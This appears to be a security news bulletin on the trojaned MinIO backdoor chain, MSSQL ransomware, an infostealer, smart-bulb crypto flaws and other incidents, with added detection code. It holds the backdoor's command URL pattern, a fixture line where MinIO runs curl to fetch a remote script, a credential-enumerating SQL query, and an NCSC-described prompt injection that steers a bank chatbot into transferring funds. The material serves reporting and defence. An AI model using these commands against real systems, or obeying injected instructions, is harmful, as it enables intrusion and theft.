Musk has approvingly eyed the social networks in China for some time, and his acquisition of Twitter was apparently the first move in a plan to replicate their success. WeChat, in particular, combines instant messaging, voice messaging, social media, video conferencing, video games, location sharing and - perhaps of most interest to Musk - mobile payment, in the form of Weixin Pay. Despite the fact that WeChat, or Weixin, as it is known in China, shares user activity and tracking information with Chinese authorities, the app is hugely popular, with many users barely using anything else.
Perhaps remembering his early involvement in PayPal, Musk would like to expand 'X' to incorporate mobile payment functionality, if not a full marketplace. This will, of course, require stronger authentication, and so the platform has amended its Privacy Policy (at https://twitter.com/en/privacy) to state, "Based on your consent, we may collect and use your biometric information for safety, security, and identification purposes". However, the company has not stated what types of biometric data could be collected - facial scans? Iris scans? Fingerprints? - or what they would be used for.
And perhaps eyeing the success of LinkedIn, another clause states:
Job Applications / Recommendations. We may collect and use your personal information (such as your employment history, educational history, employment preferences, skills and abilities, job search activity and engagement, and so on) to recommend potential jobs for you, to share with potential employers when you apply for a job, to enable employers to find potential candidates, and to show you more relevant advertising.
Given the cutting back of Twitter's online safety and security teams, many users will view these additions with some concern.
Threat Actor Turns Object Store Into Backdoor
A new exploit chain discovered by Security Joes Incident Response team links some recent vulnerabilities in order to trojanize the MinIO object storage application and turn it into a backdoor, allowing full control over victim systems.
Many cloud services - which tend to be written in object-oriented languages - need to store unstructured data of various kinds, and so such data stores are a common feature of cloud providers. Examples include Amazon's S3, Azure Blob (Binary Large Object) Storage and Google Cloud Storage. These services provide APIs which allow objects to be directly persisted, as opposed to using an object-relational mapping layer to store an object across multiple tables of a relational database.
However, apart from the major cloud service providers' offerings, there are alternatives - among them MinIO, an open-source high-performance distributed object storage system for the Linux platform, which provides both a RESTful API and a command line interface. In the case highlighted by Security Joes, their MDR team observed a MinIO application executing a series of bash commands and trying to use curl to download Python scripts from external servers.
Closer investigation revealed that the MinIO binary was not the genuine code - rather, it had been trojaned to add extra code which would receive and execute commands via HTTP requests. Analysis of the code, coupled with a search of external repositories, showed that it came from a GitHub project named 'evil_minio'. According to its maintainer, this modified version performs just like the genuine MinIO but adds a backdoor that can be accessed by adding the desired command to an 'alive' parameter in the URL:
http://vulnerable.minio.server/?alive=[shell_command]
Almost no effort is required to use this - in fact, the project maintainer has documented it extensively in a PDF!
The question then became, how did this trojaned version of MinIO get installed? The answer lies in two vulnerabilities:
- CVE-2023-28432 - an information disclosure vulnerability which reveals the values of environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD
- CVE-2023-28434 - a vulnerability which allows crafted requests to bypass metadata bucket name checking and place an object into any bucket while processing PostPolicyBucket
And so installation of the trojaned version is achieved by first obtaining the admin credentials using CVE-2023-28432 via a POST request to /minio/bootstrap/v1/verify, then using these credentials to connect via a remote MinIO command line client, and finally triggering an update which points to an update repository controlled by the attacker (the ability to specify a repository is a legitimate feature, useful for installations which are behind a firewall).
From this point on, the trojaned MinIO installation's backdoor can be used to connect to a C2 server, fetching and executing a variety of post-exploitation bash scripts which can, in turn, be used to profile the compromised system as well as performing network reconnaissance, among other tasks.
The Security Joes blog post provides comprehensive and detailed analysis, along with IOCs and a MITRE ATT&CK mapping of TTPs. The simplest mitigation is to upgrade any MinIO installation to RELEASE.2023-03-20T20-16-18Z or later.
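Both stages of this chain leave observable traces: the credential-disclosure request to /minio/bootstrap/v1/verify arriving from a host that is not a cluster peer, the 'alive' parameter on ordinary GET requests, and a MinIO server process spawning shells and download tools. The following is an added example of detection logic for those traces, not Security Joes' own tooling; the access-log lines (NCSA combined format, as a reverse proxy in front of MinIO would write them), the process-start events and the CLUSTER_NODES set are all constructed for the example.

```python
"""Detect the observable stages of the MinIO attack chain in request logs and
process-start events. Added example with constructed data."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (NCSA combined format) from a proxy in front of MinIO.
ACCESS_LOG = """\
203.0.113.7 - - [04/Sep/2023:10:01:02 +0000] "POST /minio/bootstrap/v1/verify HTTP/1.1" 200 512 "-" "Go-http-client/1.1"
198.51.100.3 - - [04/Sep/2023:10:01:05 +0000] "GET /backups/db.tar.gz HTTP/1.1" 200 104857 "-" "MinIO (linux; amd64) minio-go/v7"
203.0.113.7 - - [04/Sep/2023:10:04:40 +0000] "GET /?alive=id HTTP/1.1" 200 61 "-" "curl/8.1.2"
203.0.113.7 - - [04/Sep/2023:10:05:12 +0000] "GET /?alive=whoami HTTP/1.1" 200 7 "-" "curl/8.1.2"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
VERIFY_PATH = "/minio/bootstrap/v1/verify"
# Assumption: the bootstrap verify endpoint is only ever called by MinIO's own
# peer nodes, so the set of legitimate callers is known.
CLUSTER_NODES = {"10.0.0.11", "10.0.0.12"}


def parse_line(line: str):
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query)
    return rec


def classify_request(rec: dict):
    """Return a reason string if the request matches a known stage, else None."""
    if rec["method"] == "POST" and rec["path"] == VERIFY_PATH and rec["ip"] not in CLUSTER_NODES:
        return "CVE-2023-28432 probe: bootstrap verify from non-cluster host"
    if "alive" in rec["query"]:
        return "evil_minio backdoor: 'alive' parameter carrying %r" % rec["query"]["alive"][0]
    return None


def scan_access_log(text: str) -> list:
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        why = classify_request(rec)
        if why:
            findings.append({"ip": rec["ip"], "ts": rec["ts"], "why": why})
    return findings


# Constructed process-start events (parent image, child image, argv), as an
# EDR agent or auditd execve records would supply them.
PROC_EVENTS = [
    {"parent": "minio", "child": "minio", "argv": ["minio", "server", "/data"]},
    {"parent": "minio", "child": "bash", "argv": ["bash", "-c", "curl -s http://198.51.100.9/s.py -o /tmp/s.py"]},
    {"parent": "sshd", "child": "bash", "argv": ["bash"]},
]
SHELLS_AND_FETCHERS = {"sh", "bash", "dash", "curl", "wget", "python", "python3"}


def suspicious_children(events: list, server: str = "minio") -> list:
    """A genuine MinIO server has no reason to spawn shells or download tools."""
    return [e for e in events if e["parent"] == server and e["child"] in SHELLS_AND_FETCHERS]


if __name__ == "__main__":
    for f in scan_access_log(ACCESS_LOG):
        print(f)
    for e in suspicious_children(PROC_EVENTS):
        print("suspicious child process:", e["argv"])
```

The process-tree rule is the more robust of the two, since it does not depend on the attacker reusing the published 'alive' parameter name; the request rules are useful for retrospective hunting in existing logs once the IOCs are known.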
Security Joes, New Attack Vector In The Cloud: Attackers caught exploiting Object Storage Services, blog post, 4 September 2023. Available online at https://www.securityjoes.com/post/new-attack-vector-in-the-cloud-attackers-caught-exploiting-object-storage-services.
News Stories
Sydney University Discloses Data Breach
A third-party service provider to the University of Sydney has suffered a data breach affecting "a limited number of recently applied and enrolled international applicants’ personal data". The breach was confined to a single platform, and has not affected other university systems; the University claims that there is no evidence that any personal information has been misused, although experience shows that such statements often have to be revised over time.
So far, it appears that no data relating to domestic students, staff, alumni or donors has been affected, and the University is working to contact impacted students and applicants.
This incident is just the latest to affect a university, as the education sector - and its third-party providers - becomes an increasingly popular target.
University of Sydney, Cyber incident, web page, 30 August 2023. Available online at https://www.sydney.edu.au/about-us/governance-and-structure/cybersecurity/cyber-incident.html.
MS SQL Servers Targeted With Ransomware
Researchers from the Securonix Threat Research team have identified a campaign which targets Internet-exposed Microsoft SQL Server systems by brute-forcing logins. After gaining access, the attackers immediately enumerate the database, in particular searching for other login credentials by using SQL statements like
SELECT name FROM sys.sql_logins WHERE name IS NOT NULL
Upon discovering that the xp_cmdshell stored procedure was enabled (!), the attackers used it to run commands such as wmic, whoami, net use, etc., on the underlying machine in order to enumerate system and user information.
Next, in order to secure persistent access, the attackers created several user accounts in the administrators group, then made a number of changes to enable RDP access, disabled the system firewall and mounted a remote shared drive using the SMB protocol, allowing them to transfer files and install their tools. From there, they installed the AnyDesk remote desktop program to provide an additional access mechanism.
This was followed by the installation of a port scanner to enumerate the local network and credential dumping using Mimikatz. In the case analyzed by Securonix, the threat actor seems to have decided the local network was not worth further exploration, and they dropped a modified variant of the Mimic ransomware, which sets about identifying and encrypting target files before leaving a ransom note in a text file.
The Securonix researchers dubbed this ransomware variant "FreeWorld", and the campaign itself DB#JAMMER. Their report maps the various stages of the attack to the MITRE ATT&CK matrix, and also provides IOCs and suggested mitigations.
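The first two stages of this campaign - the password-guessing burst and the enabling of xp_cmdshell - both show up in the SQL Server ERRORLOG, so they can be caught before the persistence and ransomware stages. The following is an added example of that detection, not Securonix's tooling; the ERRORLOG lines are constructed in the real ERRORLOG layout and assume login auditing is set to record both failed and successful logins (the default records failed logins only).

```python
"""Spot the opening moves of a DB#JAMMER-style intrusion in SQL Server ERRORLOG
lines: a password-guessing burst from one client against one login, a
subsequent successful login from the same client, and a risky server option
such as xp_cmdshell being switched on. Added example; constructed log lines."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed ERRORLOG excerpt. Assumes login auditing records successes too.
ERRORLOG = """\
2023-08-30 02:10:01.10 Logon       Error: 18456, Severity: 14, State: 8.
2023-08-30 02:10:01.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2023-08-30 02:10:03.42 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2023-08-30 02:10:05.90 Logon       Login failed for user 'app'. Reason: Password did not match that for the login provided. [CLIENT: 198.51.100.20]
2023-08-30 02:10:06.11 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2023-08-30 02:10:08.77 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2023-08-30 02:10:11.03 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2023-08-30 02:10:13.55 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2023-08-30 02:10:15.20 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 203.0.113.5]
2023-08-30 02:11:30.55 spid55      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
"""

LINE_RE = re.compile(r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2}) (?P<src>\S+)\s+(?P<msg>.*)$")
FAIL_RE = re.compile(r"Login failed for user '(?P<user>[^']*)'.*\[CLIENT: (?P<ip>[^\]]+)\]")
OK_RE = re.compile(r"Login succeeded for user '(?P<user>[^']*)'.*\[CLIENT: (?P<ip>[^\]]+)\]")
CFG_RE = re.compile(r"Configuration option '(?P<opt>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)")
# Options an attacker enables to run OS commands or reach out from the server.
RISKY_OPTIONS = {"xp_cmdshell", "Ole Automation Procedures"}


def parse(text: str):
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f"), m["src"], m["msg"]


def analyze(text: str, burst: int = 5, window: timedelta = timedelta(seconds=60)) -> list:
    failures = defaultdict(list)  # (client ip, login) -> recent failure timestamps
    alerts = []
    for ts, _src, msg in parse(text):
        m = FAIL_RE.search(msg)
        if m:
            key = (m["ip"], m["user"])
            recent = [t for t in failures[key] if ts - t <= window] + [ts]
            failures[key] = recent
            if len(recent) == burst:  # fire once, on the burst-th failure in the window
                alerts.append({"kind": "password-guessing", "ip": key[0], "user": key[1], "at": ts})
            continue
        m = OK_RE.search(msg)
        if m:
            key = (m["ip"], m["user"])
            if failures.get(key):
                alerts.append({"kind": "success-after-failures", "ip": key[0], "user": key[1],
                               "failures": len(failures[key]), "at": ts})
            continue
        m = CFG_RE.search(msg)
        if m and m["opt"] in RISKY_OPTIONS and m["new"] != "0":
            alerts.append({"kind": "risky-option-enabled", "option": m["opt"], "at": ts})
    return alerts


if __name__ == "__main__":
    for a in analyze(ERRORLOG):
        print(a)
```

The single failure for 'app' from a different client stays below the burst threshold and produces nothing, which is the point of keying on (client, login) rather than on raw failure counts; a successful login that follows a burst from the same client is the alert worth paging on.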
Iuzvyk, D., T. Peck and O. Kolesnikov, Securonix Threat Labs Security Advisory: Threat Actors Target MSSQL Servers in DB#JAMMER to Deliver FreeWorld Ransomware, blog post, 1 September 2023. Available online at https://www.securonix.com/blog/securonix-threat-labs-security-advisory-threat-actors-target-mssql-servers-in-dbjammer-to-deliver-freeworld-ransomware/.
News Stories
Open Source Stealer Catches On Quickly
Black hats everywhere got a very nice present last Christmas with the publication on GitHub of the code for a versatile infostealer called SapphireStealer. It didn't take long for a variety of threat actors to latch on to this gift, downloading it and tinkering with the code to add functionality as well as to add detection-evasion features. By mid-January 2023, modified binaries were being uploaded to public malware repositories, and by now multiple threat actors have adopted SapphireStealer, continuing to adapt and improve its capabilities.
Now, researchers at Cisco Talos have provided an analysis of this increasingly popular black hat tool. SapphireStealer was written for the .NET platform and initially offered some basic functionality, such as capturing host information (IP address, hostname, OS and CPU architecture, etc.), screenshots, cached browser credentials and exfiltrating a variety of filetypes under the user's Desktop folder. It specifically targets Chromium-based browsers, killing their processes and then searching for their credential databases before taking a screenshot and creating a zipfile of this data, plus any files it finds.
The data is actually exfiltrated by using the SMTP protocol to send it via mail.ru, using embedded credentials - after all, if you can compile the source code, this eliminates any need for separate configuration files. However, later samples created by other threat actors use a variety of exfiltration methods including a Discord webhook API and Telegram channels, and also target a variety of additional filetypes. The code has also been refactored to make it more efficient.
However, the use of hardcoded SMTP credentials can leak information about the threat actors themselves - the Cisco Talos researchers were able to identify one hacker who rather sloppily seems to have used a personal email account which, matched with other clues in the source, led to his identification as a Russian freelance web developer. Tsk, tsk.
Brumaghin, Edmund, SapphireStealer: Open-source information stealer enables credential and data theft, blog post, 31 August 2023. Available online at https://blog.talosintelligence.com/sapphirestealer-goes-open-source/.
Light Bulbs Leak Credentials
While many smart home devices connect via the Zigbee low-bandwidth mesh network protocol, this involves the use of a gateway between the owner's wi-fi network and the Zigbee network - an additional expense which some manufacturers try to undercut by putting their devices directly on the 802.11 wi-fi network. This cuts costs, but it means that an attacker can use conventional tools and techniques to attack such devices and then potentially pivot, using them to attack more valuable targets on the wi-fi network. And this is a real problem because IoT devices are notorious for having vulnerabilities in their firmware, making them an ideal pivot point for attackers.
A classic example comes by courtesy of three researchers at the University of Catania in Italy and Royal Holloway, University of London. In a paper published in the Proceedings of the 20th International Conference on Security and Cryptography, they pretty much demolished the security of the TP-Link Tapo Smart Wi-Fi Light Bulb, Multicolor (L530E), discovering four very basic vulnerabilities (the kind that would get my cryptography students a sharp comment in assignment feedback).
Like many such devices, the light bulb must first be joined to the user's wi-fi network. On first being powered up, the bulb operates as an access point with its own SSID of Tapo Bulb XXXX, and the user then connects their smartphone to this AP, using the Tapo app to provide the real network SSID and passphrase/key. The problem is that this transaction is almost completely unauthenticated, allowing an attacker to masquerade as a lightbulb and capture the owner's network credentials. This vulnerability garners a CVSS score of 8.8, i.e. high severity.
Such authentication as there is relies on a keyed hash which uses a hard-coded 32-bit key - and by capturing just one genuine message exchanged between a bulb and the Tapo app, this key can be recovered by a brute-force offline attack in just over a couple of hours (CVSS score: 7.6, high severity).
The third vulnerability is a classic of its type: the use of AES-128-CBC, i.e. cipher block chaining mode, with the same initialization vector for every message (CVSS score: 4.6, medium severity). And to complete the picture, the protocol is vulnerable to replay attacks, since there is no use of message IDs, timestamps or nonces to ensure message freshness (CVSS score: 5.7, medium severity).
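The third and fourth vulnerabilities are easiest to understand by seeing what a fixed IV gives away and what a freshness check looks like on the receiving side. The following is an added example, not the Tapo firmware or the paper's code: it implements CBC mode over a toy 16-byte Feistel block cipher built on SHA-256 (so it runs with the standard library alone; the block cipher is not AES and is not meant to be secure), shows that a fixed IV makes repeated or equal-prefix commands recognisable in the ciphertext while a per-message IV does not, and adds a receiver-side nonce-and-timestamp check that rejects replayed messages.

```python
"""Why a fixed IV and missing freshness are defects: CBC with a per-message IV,
and a receiver-side replay check. Added example with a toy block cipher."""
import hashlib
import os
import time

BLOCK = 16


def _f(key: bytes, half: bytes, rnd: int) -> bytes:
    """Toy Feistel round function (SHA-256 truncated); NOT a real cipher."""
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]


def toy_encrypt_block(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for rnd in range(4):
        l, r = r, bytes(a ^ b for a, b in zip(l, _f(key, r, rnd)))
    return l + r


def toy_decrypt_block(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for rnd in reversed(range(4)):
        l, r = bytes(a ^ b for a, b in zip(r, _f(key, l, rnd))), l
    return l + r


def _pad(data: bytes) -> bytes:  # PKCS#7
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def _unpad(data: bytes) -> bytes:
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    prev, out, data = iv, b"", _pad(plaintext)
    for i in range(0, len(data), BLOCK):
        prev = toy_encrypt_block(key, bytes(a ^ b for a, b in zip(data[i:i + BLOCK], prev)))
        out += prev
    return out


def cbc_decrypt(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    prev, out = iv, b""
    for i in range(0, len(ciphertext), BLOCK):
        blk = ciphertext[i:i + BLOCK]
        out += bytes(a ^ b for a, b in zip(toy_decrypt_block(key, blk), prev))
        prev = blk
    return _unpad(out)


def leaks_equal_prefix(key: bytes, iv: bytes, m1: bytes, m2: bytes) -> bool:
    """With a fixed IV, two messages sharing a 16-byte prefix share their first
    ciphertext block, so an observer learns which commands are 'the same'."""
    return cbc_encrypt(key, iv, m1)[:BLOCK] == cbc_encrypt(key, iv, m2)[:BLOCK]


def encrypt_message(key: bytes, plaintext: bytes) -> bytes:
    """The fix for the IV problem: a fresh random IV per message, sent in clear."""
    iv = os.urandom(BLOCK)
    return iv + cbc_encrypt(key, iv, plaintext)


def decrypt_message(key: bytes, blob: bytes) -> bytes:
    return cbc_decrypt(key, blob[:BLOCK], blob[BLOCK:])


class FreshnessChecker:
    """The fix for the replay problem: each message carries a nonce and a
    timestamp; the nonce must be unseen and the timestamp within `skew` seconds
    of the receiver's clock (the bulb's clock source is an assumption here)."""

    def __init__(self, skew: float = 30.0, now=time.time):
        self.skew, self.now, self.seen = skew, now, set()

    def accept(self, nonce: str, ts: float) -> bool:
        if abs(self.now() - ts) > self.skew or nonce in self.seen:
            return False
        self.seen.add(nonce)
        return True
```

The nonce set grows without bound as written; in a real device it would be pruned once entries fall outside the timestamp window, which is why the timestamp check accompanies the nonce check rather than replacing it.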
The researchers responsibly disclosed these vulnerabilities to Tp-Link, of course, and the company is working on updated firmware for the bulbs. Meanwhile, the work experience kid or summer intern who wrote the code has presumably signed up for a cryptography class next semester.
But all this serves as a reminder: IoT devices and the vulnerabilities they bring with them can pose a severe risk to other devices on the same network. Placing devices like light bulbs and locks on a Zigbee network behind a gateway adds an extra level of security as well as additional benefits like increased range for external lights.
Bonaventura, Davide, Sergio Esposito and Giampaolo Bella, Smart Bulbs can be Hacked to Hack into your Household, Proc. 20th Intl. Conf. on Security and Cryptography, pp. 218-229. Available online at https://arxiv.org/abs/2308.09019.
News Stories
NCSC Warns of AI Chatbot Prompt Injection Attacks
AI chatbots, which use generative transformers to extract information from pre-trained large language models (LLMs), are very sensitive to the format of the prompts which are used to query them. Increasingly, however, such chatbots are being integrated into a variety of products and services - some for internal use within organizations, and some for use by customers. And because some of the behaviours exhibited by these chatbots are unpredictable - think of 'AI hallucinations' which have caused LLMs to reference non-existent research papers or cite non-existent law cases - they are ripe for exploitation by creative hackers willing to experiment with prompts.
One problem is that LLMs are unable to distinguish between an instruction and data provided to help complete the instruction. This could, hypothetically, be exploited by an attacker who constructs an invoice or transaction request, with the transaction reference hiding a prompt injection aimed at the LLM underlying the recipient's bank's AI chatbot. Later, when the recipient asks the chatbot, "Am I spending more this month?", the LLM analyses this month's transactions, encounters the malicious transaction and transforms this into a request to transfer funds to the attacker's account. Although this example is hypothetical, similar attempted attacks have been seen in the wild.
Over the years, we have developed a good understanding of SQL injection, command injection and other injection attacks. But since LLM-based chatbots are intended to interact using natural human language, simple syntax-based input sanitization techniques are unlikely to work without rendering the chatbot near-useless. We need to dig deeper into the semantic processing performed by transformers in order to make chatbots resistant to prompt injection; the problem is not dissimilar to making human users resistant to social engineering.
C, Dave, Exercise caution when building off LLMs, blog post, 30 August 2023. Available online at https://www.ncsc.gov.uk/blog-post/exercise-caution-building-off-llms.
NCSC and Partners Analyze Infamous Chisel Malware
In other news from the NCSC, it - along with a number of Five Eyes partners - has released a malware analysis report on the Infamous Chisel mobile device malware. Infamous Chisel, which targets Android devices, is associated with the Sandworm threat actor group, which is linked to the Main Centre for Special Technologies (GTsST) within the GRU, Russia's military intelligence service.
In essence, Infamous Chisel is a collection of components which enable persistent access to an infected device via a backdoor over the Tor onion routing network or via SSH, while periodically collecting and exfiltrating victim information, such as device configuration, and files, either of commercial interest or from applications which are specific to the Ukrainian military. It can also scan the local network, gathering information about active hosts, open ports and banner messages.
The 35-page report provides a detailed analysis of the various components and IOCs, which are also available in STIX JSON and XML formats via CISA:
- AR23-243A STIX in JSON format: https://www.cisa.gov/sites/default/files/2023-08/AR23-243A%20Infamous%20Chisel%20Malware%20Analysis%20Report.stix_.json
- AR23-243A STIX in XML format: https://www.cisa.gov/sites/default/files/2023-08/AR23-243A.stix_.xml
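A STIX JSON bundle is only useful once its indicator patterns are pulled out and compared with local telemetry. The following is an added example of that step, not CISA's or NCSC's tooling: it extracts the (object path, value) comparisons from each STIX 2.1 indicator pattern and matches them against constructed observations. The bundle below is constructed with obvious placeholder values; it does not contain the real Infamous Chisel indicators, which are in the linked AR23-243A files.

```python
"""Extract indicators from a STIX 2.1 bundle and match them against local
observations. Added example; the bundle and observations are constructed."""
import json
import re

# Constructed bundle in the STIX 2.1 layout; ids and values are placeholders.
SAMPLE_BUNDLE = json.dumps({
    "type": "bundle",
    "id": "bundle--00000000-0000-4000-8000-000000000001",
    "objects": [
        {"type": "indicator", "id": "indicator--00000000-0000-4000-8000-000000000002",
         "name": "placeholder dropper", "pattern_type": "stix",
         "valid_from": "2023-08-31T00:00:00Z",
         "pattern": "[file:hashes.'SHA-256' = '" + "a" * 64 + "']"},
        {"type": "indicator", "id": "indicator--00000000-0000-4000-8000-000000000003",
         "name": "placeholder C2", "pattern_type": "stix",
         "valid_from": "2023-08-31T00:00:00Z",
         "pattern": "[domain-name:value = 'c2.example.invalid' OR ipv4-addr:value = '203.0.113.77']"},
        {"type": "malware", "id": "malware--00000000-0000-4000-8000-000000000004",
         "name": "Infamous Chisel", "is_family": True},
    ],
})

# One comparison inside a STIX pattern: <object-path> = '<value>'.
ATOM_RE = re.compile(r"([\w-]+:[\w.'-]+?)\s*=\s*'([^']*)'")


def extract_indicators(bundle_json: str) -> list:
    """Flatten every indicator's pattern into (path, value) atoms.
    Only equality comparisons are handled; other operators are skipped."""
    bundle = json.loads(bundle_json)
    out = []
    for obj in bundle.get("objects", []):
        if obj.get("type") != "indicator" or obj.get("pattern_type", "stix") != "stix":
            continue
        for path, value in ATOM_RE.findall(obj["pattern"]):
            out.append({"path": path, "value": value,
                        "indicator": obj["id"], "name": obj.get("name", "")})
    return out


def build_index(indicators: list) -> dict:
    """(path, lower-cased value) -> indicator names, for constant-time lookup."""
    idx = {}
    for ind in indicators:
        idx.setdefault((ind["path"], ind["value"].lower()), []).append(ind["name"])
    return idx


# Constructed local telemetry, expressed with the same STIX object paths.
OBSERVATIONS = [
    {"path": "file:hashes.'SHA-256'", "value": "a" * 64, "host": "phone-01"},
    {"path": "domain-name:value", "value": "C2.EXAMPLE.INVALID", "host": "phone-02"},
    {"path": "ipv4-addr:value", "value": "192.0.2.9", "host": "phone-02"},
]


def match_observations(indicators: list, observations: list) -> list:
    idx = build_index(indicators)
    hits = []
    for obs in observations:
        key = (obs["path"], obs["value"].lower())
        if key in idx:
            hits.append(dict(obs, matched=idx[key]))
    return hits


if __name__ == "__main__":
    inds = extract_indicators(SAMPLE_BUNDLE)
    for hit in match_observations(inds, OBSERVATIONS):
        print(hit["host"], hit["path"], "->", hit["matched"])
```

Case-folding the values matters for domain names and hex digests, which different tools emit in different cases; it is harmless for IP addresses. A full STIX pattern grammar also allows `MATCHES`, `LIKE`, set membership and time qualifiers, none of which this regex covers.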
NCSC, Infamous Chisel: Malware Analysis Report, report, 31 August 2023. Available online at https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/infamous-chisel/NCSC-MAR-Infamous-Chisel.pdf.
News Stories
Another 'Good Hacking' Case Reported
In the cybersecurity world, we view risk as being all downside - but risk professionals will tell you that the inherent uncertainties sometimes work in your favour and produce favourable outcomes. The speculative risk in investments provides a good example: occasionally, a stock takes off for some reason, and you make a windfall. There aren't many such cases in our field, but it sometimes happens - for example, I've received vulnerability reports from unknown white- or, possibly, grey-hats, tipping me off before a black hat discovered them.
Now, echoing yesterday's report of the FBI's stealthy distribution of a tool to disable the Qakbot malware, comes news of another hack-the-hackers exploit.
For some years, a piece of Portuguese-language phone spyware called WebDetetive has been implanted on the phones of victims in South America, generally manually, by someone known to the victim, and who knows the phone's passcode. Once installed, the spyware disguises itself by changing its icon, and then sets about uploading messages, call logs, phone call recordings, photos, ambient microphone recordings and precise location data to the WebDetetive servers. Whoever installed the spyware can now surveil the victim - which is why this type of spyware is often referred to as 'stalkerware'.
However, unnamed hackers recently identified several vulnerabilities which allowed them to compromise WebDetetive's servers and access its user database. Further exploiting the product's dashboard, which the stalkers use to surveil their victims, the hackers were able to download every dashboard record, including every customer's email address.
Using the dashboard, the hackers were also able to delete victim devices from the spyware network, preventing them from uploading further data. "Which we definitely did. Because we could. Because #fuckstalkerware", wrote the hackers in an undated note included among 1.5 GB of data scraped from the spyware's dashboard. This data included information about each customer - the IP address they had logged in from, their purchase history and also details of every device that customer had compromised, including the spyware version number and the types of data being collected. Importantly, the data did not include any data stolen from the victims' phones.
The data was indexed by DDoSecrets (https://ddosecrets.com/wiki/Distributed_Denial_of_Secrets), who shared it with TechCrunch for analysis, revealing that 74,336 unique customer email addresses had used the spyware to compromise 76,794 victim phones.
The breach puts WebDetetive's management in a tough spot. Will they notify their customers of the breach, assuming they still have records to do so? Email enquiries sent by TechCrunch got no response. But a lot of phone users, particularly victims of domestic violence and abuse, can breathe a little easier.
Whittaker, Zack, A Brazilian phone spyware was hacked and victims’ devices ‘deleted’ from server, TechCrunch, 27 August 2023. Available online at https://techcrunch.com/2023/08/26/brazil-webdetetive-spyware-deleted/.
Qakbot Advisory
Speaking of Qakbot, as we were just yesterday, CISA and the FBI have released a joint Cybersecurity Advisory to disseminate the IOCs discovered and used in the FBI takedown, along with recommendations for mitigation. There's quite a lot of useful detail in the 9-page advisory, including an overview of the botnet's three-tier C2 infrastructure and a mapping to the MITRE ATT&CK framework.
CISA, Identification and Disruption of QakBot Infrastructure, cybersecurity advisory, 30 August 2023. Available online at https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-242a.
Mozilla Security Updates
The Mozilla Foundation has released security updates to address vulnerabilities in:
- Firefox 117 (https://www.mozilla.org/en-US/security/advisories/mfsa2023-34/)
- Firefox ESR 115.2 (https://www.mozilla.org/en-US/security/advisories/mfsa2023-36/), and
- Firefox ESR 102.15 (https://www.mozilla.org/en-US/security/advisories/mfsa2023-35/)
You know what to do - end users, choose Help -> About Firefox in the menu and let the update download, while admins who redistribute the browsers in their organizations should get ready to roll out the new versions.